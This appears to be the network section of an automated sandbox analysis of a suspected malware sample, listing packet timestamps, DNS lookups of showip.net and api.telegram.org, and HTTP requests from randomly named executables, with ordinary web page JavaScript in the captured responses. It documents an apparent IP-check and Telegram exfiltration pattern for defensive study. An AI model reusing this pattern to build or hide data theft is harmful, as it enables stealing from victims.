                                                                                      Nov 27, 2024 20:48:05.856812954 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:05.856991053 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:05.857023001 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:05.903333902 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.110220909 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.110419989 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.110451937 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.110461950 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.110469103 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.110578060 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.110605001 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.110785961 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.110840082 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.111099958 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.151335955 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.442677021 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.442826986 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.442878008 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.442938089 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.442985058 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.443003893 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.487340927 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.705734968 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.705987930 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.706036091 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.706268072 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:06.747334957 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:06.976300955 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:07.222729921 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:07.222959995 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:07.223001957 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:07.223125935 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:07.237003088 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:07.237035990 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:07.263336897 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:07.714330912 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:08.568893909 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:08.569046974 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.569081068 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.569122076 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:08.569134951 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:08.569253922 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.569269896 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.569356918 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.570377111 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:08.611355066 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:08.785600901 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:08.785878897 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.785917997 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:08.785928011 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.786150932 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.786195040 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:08.831331015 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:10.372364044 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:10.372536898 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:10.372571945 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:10.372582912 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:10.372699976 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:10.372863054 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:10.415332079 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:10.722784042 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:10.722958088 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:10.722990036 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:10.723001003 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:10.723119974 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:10.723148108 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:10.763339996 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:11.135801077 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:11.139405966 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:11.139444113 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:11.187340975 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:12.780476093 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:12.780631065 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:12.780662060 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:12.780683994 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:12.780704975 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:12.780714035 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:12.780750036 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:12.781173944 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:12.781218052 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:12.781260967 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:12.781289101 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:12.827333927 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:13.121506929 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:13.121767044 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.121829033 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.121854067 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.167339087 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:13.278134108 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:13.278342009 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.278373957 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.278404951 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:13.278532028 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.279146910 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.319336891 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:13.842927933 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:13.843111992 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.843147993 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:13.843156099 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.843276978 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.843302965 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.843518019 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:13.887341976 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.667849064 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.668004036 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.668025970 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.668035984 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.668057919 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.668164015 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.668184042 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.715339899 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.829062939 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.829277039 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.829344034 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.875327110 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.875503063 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.875777006 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.875876904 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:14.919339895 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.992755890 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:14.992959976 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:15.039335966 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:15.124473095 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:15.279149055 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:15.389825106 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:15.389955997 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:15.389987946 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:15.390028954 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:15.390547037 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:15.390573978 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:15.586384058 CET49807443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:15.586424112 CET44349807149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:15.586507082 CET49807443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:15.586832047 CET49807443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:15.586847067 CET44349807149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:15.770386934 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:20.908548117 CET44349807149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:20.908988953 CET49807443192.168.2.5149.154.167.220

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 27, 2024 20:46:29.785741091 CET5687453192.168.2.51.1.1.1
                                                                                      Nov 27, 2024 20:46:30.347095013 CET53568741.1.1.1192.168.2.5
                                                                                      Nov 27, 2024 20:46:37.921238899 CET6494653192.168.2.51.1.1.1
                                                                                      Nov 27, 2024 20:46:38.072345972 CET53649461.1.1.1192.168.2.5
                                                                                      Nov 27, 2024 20:46:53.005012989 CET5711353192.168.2.51.1.1.1
                                                                                      Nov 27, 2024 20:46:53.232523918 CET53571131.1.1.1192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 27, 2024 20:46:29.785741091 CET192.168.2.51.1.1.10xbae5Standard query (0)showip.netA (IP address)IN (0x0001)false
                                                                                      Nov 27, 2024 20:46:37.921238899 CET192.168.2.51.1.1.10xcfa3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      Nov 27, 2024 20:46:53.005012989 CET192.168.2.51.1.1.10x6baStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 27, 2024 20:46:30.347095013 CET1.1.1.1192.168.2.50xbae5No error (0)showip.net162.55.60.2A (IP address)IN (0x0001)false
                                                                                      Nov 27, 2024 20:46:38.072345972 CET1.1.1.1192.168.2.50xcfa3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      Nov 27, 2024 20:46:53.232523918 CET1.1.1.1192.168.2.50x6baNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • api.telegram.org
                                                                                      • showip.net

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549740162.55.60.2804848C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 27, 2024 20:46:30.479710102 CET58OUTGET / HTTP/1.1
                                                                                      User-Agent: Project1
                                                                                      Host: showip.net
                                                                                      Nov 27, 2024 20:46:31.764827967 CET1236INHTTP/1.1 200 OK
                                                                                      Access-Control-Allow-Headers: *
                                                                                      Access-Control-Allow-Methods: *
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Date: Wed, 27 Nov 2024 19:46:31 GMT
                                                                                      Server: Caddy
                                                                                      Transfer-Encoding: chunked
                                                                                      Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED]
                                                                                      Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
                                                                                      Nov 27, 2024 20:46:31.764981031 CET1236INData Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f
                                                                                      Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;
                                                                                      Nov 27, 2024 20:46:31.764995098 CET1236INData Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72
                                                                                      Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
                                                                                      Nov 27, 2024 20:46:31.765110970 CET1236INData Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20
                                                                                      Data Ascii: ge"))||(C()?A("Microsoft Edge"):B("Edg/"))||C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
                                                                                      Nov 27, 2024 20:46:31.765124083 CET612INData Raw: 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 64 3d 48 28 61 29 3b 69 66 28 64 26 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72
                                                                                      Data Ascii: ay(a))throw Error();d=H(a);if(d&64)return a;d|=64;if(c&&(d|=512,c!==a[0]))throw Error();a:{c=a;var e=c.length;if(e){var f=e-1,g=c[f];if(N(g)){d|=256;b=(d>>9&1)-1;e=f-b;1024<=e&&(za(c,b,g),e=1023);d=d&-2095105|(e&1023)<<11;break a}}b&&(g=(d>>9&
                                                                                      Nov 27, 2024 20:46:31.765135050 CET1236INData Raw: 29 26 26 74 61 26 26 6e 75 6c 6c 21 3d 61 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 69 66 28 75 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 30 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 30 32 34 30 3b
                                                                                      Data Ascii: )&&ta&&null!=a&&a instanceof Uint8Array){if(ua){for(var b="",c=0,d=a.length-10240;c<d;)b+=String.fromCharCode.apply(null,a.subarray(c,c+=10240));b+=String.fromCharCode.apply(null,c?a.subarray(c):a);a=btoa(b)}else{void 0===b&&(b=0);if(!E){E={};
                                                                                      Nov 27, 2024 20:46:31.765146971 CET1236INData Raw: 2e 63 61 6c 6c 28 61 2c 68 29 26 26 28 67 5b 68 5d 3d 44 61 28 61 5b 68 5d 2c 62 2c 63 2c 64 2c 65 2c 66 29 29 3b 61 3d 67 7d 65 6c 73 65 20 61 3d 62 28 61 2c 64 29 3b 72 65 74 75 72 6e 20 61 7d 7d 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20
                                                                                      Data Ascii: .call(a,h)&&(g[h]=Da(a[h],b,c,d,e,f));a=g}else a=b(a,d);return a}} function Ea(a,b,c,d,e,f){var g=d||c?H(a):0;d=d?!!(g&32):void 0;a=Array.prototype.slice.call(a);for(var h=0;h<a.length;h++)a[h]=Da(a[h],b,c,d,e,f);c&&c(g,a);return a}funct
                                                                                      Nov 27, 2024 20:46:31.765160084 CET1236INData Raw: 63 74 69 6f 6e 20 4c 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 4d 61 3b 76 61 72 20 64 3d 76 6f 69 64 20 30 3d 3d 3d 64 3f 21 31 3a 64 3b 76 61 72 20 65 3d 61 2e 68 3b 76 61 72 20 66 3d 4a 28 65 29 2c 67 3d 4a 61 28 65 2c 66 2c 62 2c 64 29 3b 76 61
                                                                                      Data Ascii: ction La(a,b){var c=Ma;var d=void 0===d?!1:d;var e=a.h;var f=J(e),g=Ja(e,f,b,d);var h=!1;if(null==g||"object"!==typeof g||(h=Array.isArray(g))||g.s!==M)if(h){var k=h=H(g);0===k&&(k|=f&32);k|=f&2;k!==h&&I(g,k);c=new c(g)}else c=void 0;else c=g;
                                                                                      Nov 27, 2024 20:46:31.765516043 CET1236INData Raw: 3d 3d 68 5b 6b 5d 3f 68 5b 6b 5d 3d 63 3f 4f 3a 77 61 28 29 3a 63 26 26 72 21 3d 3d 4f 26 26 76 61 28 72 29 7d 64 3d 62 2e 6c 65 6e 67 74 68 3b 69 66 28 21 64 29 72 65 74 75 72 6e 20 62 3b 0a 20 20 20 20 20 20 76 61 72 20 43 61 3b 69 66 28 4e 28
                                                                                      Data Ascii: ==h[k]?h[k]=c?O:wa():c&&r!==O&&va(r)}d=b.length;if(!d)return b; var Ca;if(N(h=b[d-1])){a:{var y=h;e={};c=!1;for(var ca in y)Object.prototype.hasOwnProperty.call(y,ca)&&(a=y[ca],Array.isArray(a)&&a!=a&&(c=!0),null!=a?e[ca]=a:c=!0);if(c){f
                                                                                      Nov 27, 2024 20:46:31.765532970 CET1236INData Raw: 3d 28 63 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 26 26 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 77 69 6e 64 6f 77 29 2e 64 6f 63 75 6d 65 6e 74 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72
                                                                                      Data Ascii: =(c=(a.ownerDocument&&a.ownerDocument.defaultView||window).document).querySelector)?void 0:d.call(c,"script[nonce]"))?b.nonce||b.getAttribute("nonce")||"":"")&&a.setAttribute("nonce",c)};function Ya(a){a=void 0===a?document:a;return a.createEl
                                                                                      Nov 27, 2024 20:46:31.885132074 CET1236INData Raw: 64 28 64 29 3b 61 2e 6a 2e 70 75 73 68 28 64 29 7d 62 3d 58 28 61 29 3b 62 2e 73 74 79 6c 65 2e 62 6f 74 74 6f 6d 3d 22 30 22 3b 62 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 3b 62 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65
                                                                                      Data Ascii: d(d);a.j.push(d)}b=X(a);b.style.bottom="0";b.style.left="0";b.style.position="fixed";b.style.width=W(100,110).toString()+"%";b.style.zIndex=W(2147483544,2147483644).toString();b.style["background-color"]=hb(249,259,242,252,219,229);b.style["bo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549749162.55.60.2804676C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 27, 2024 20:46:34.994776964 CET58OUTGET / HTTP/1.1
                                                                                      User-Agent: Project1
                                                                                      Host: showip.net
                                                                                      Nov 27, 2024 20:46:36.371814013 CET1236INHTTP/1.1 200 OK
                                                                                      Access-Control-Allow-Headers: *
                                                                                      Access-Control-Allow-Methods: *
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Date: Wed, 27 Nov 2024 19:46:36 GMT
                                                                                      Server: Caddy
                                                                                      Transfer-Encoding: chunked
                                                                                      Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED]
                                                                                      Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
                                                                                      Nov 27, 2024 20:46:36.371869087 CET1236INData Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f
                                                                                      Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;
                                                                                      Nov 27, 2024 20:46:36.371882915 CET1236INData Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72
